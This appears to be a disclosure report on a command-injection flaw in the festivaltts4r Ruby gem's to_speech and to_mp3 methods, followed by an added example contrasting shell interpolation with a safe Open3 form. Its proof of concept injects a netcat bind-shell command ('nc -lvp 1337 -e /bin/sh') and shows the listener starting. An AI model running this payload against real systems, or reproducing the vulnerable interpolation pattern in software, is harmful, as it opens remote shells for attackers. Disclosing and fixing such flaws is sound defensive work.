Open
Description
The to_speech and to_mp3 methods allow injection of arbitrary operating system commands. This becomes exploitable whenever user-supplied input reaches these methods.
Proof of concept:

#!/usr/bin/env ruby
require "rubygems"
require "festivaltts4r"
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_speech
'";nc -lvp 1337 -e /bin/sh;echo "pwned'.to_mp3('something.mp3')

Running the script shows the injected command executing:

$ ./asdf.rb
listening on [any] 1337 ...
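The following is an added example, not code from festivaltts4r or from this report: it places the shell-interpolating pattern the report describes next to a hardened form that never invokes a shell, using a constructed payload with a harmless marker. It assumes the speech backend reads its text from stdin (festival does so with --tts); "cat" stands in for that backend so the demonstration runs offline.

```ruby
#!/usr/bin/env ruby
# Added example (not festivaltts4r's own code): the shell-interpolating pattern
# the report describes, next to a hardened form that never invokes a shell.
require "open3"

# Vulnerable pattern: the text is spliced into a shell command line, so quote
# and ';' characters inside it become shell syntax. Ruby backticks hand the
# string to /bin/sh as soon as it contains metacharacters.
# 'sink' stands in for the speech backend (assumption: festival reads the text
# from stdin when given --tts); "cat" is used here so the demo runs offline.
def speak_unsafe(text, sink: "cat")
  `echo "#{text}" | #{sink}`
end

# Hardened form: the backend is started from an argv array (no shell involved)
# and the text travels over stdin as data, never as part of a command line.
def speak_safe(text, sink: ["cat"])
  out, status = Open3.capture2(*sink, stdin_data: text)
  raise "speech backend failed: #{status}" unless status.success?
  out
end

# Constructed payload in the same shape as the report's, with a harmless
# marker instead of a listener so the effect is visible and safe to run.
PAYLOAD = %q{"; echo INJECTED; echo "}

# True when the marker appears on a line of its own, i.e. it ran as a command
# rather than being passed through as literal text.
def injected?(output)
  output.lines.map(&:strip).include?("INJECTED")
end

if __FILE__ == $0
  puts "unsafe: #{injected?(speak_unsafe(PAYLOAD))}" # true: marker ran as a command
  puts "safe:   #{injected?(speak_safe(PAYLOAD))}"   # false: payload stayed literal
end
```

With the real backend, call speak_safe(text, sink: ["festival", "--tts"]); the point is that the argument list is fixed and the user's text only ever reaches the process as stdin data.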